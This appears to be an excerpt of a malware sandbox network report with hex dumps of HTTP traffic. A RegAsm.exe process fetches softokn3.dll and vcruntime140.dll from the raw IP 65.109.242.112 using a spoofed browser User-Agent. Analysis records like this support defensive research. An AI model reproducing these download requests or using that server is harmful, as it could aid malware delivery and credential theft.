                                                                                                                                                                                                                                                                Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                                                Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                                                Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                                                Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                                                Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                                                Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                                                Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                                                Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                16192.168.2.44975265.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:27 UTC222OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:28 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:28 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:28 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                                                                                                                                                                                                Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                                                                                                                                                                                                Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                                                                                                                                                                                                Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                                Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                                Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                                Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                                Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                                Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                                Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                17192.168.2.44975365.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:30 UTC226OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:31 UTC245INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:31 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:31 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
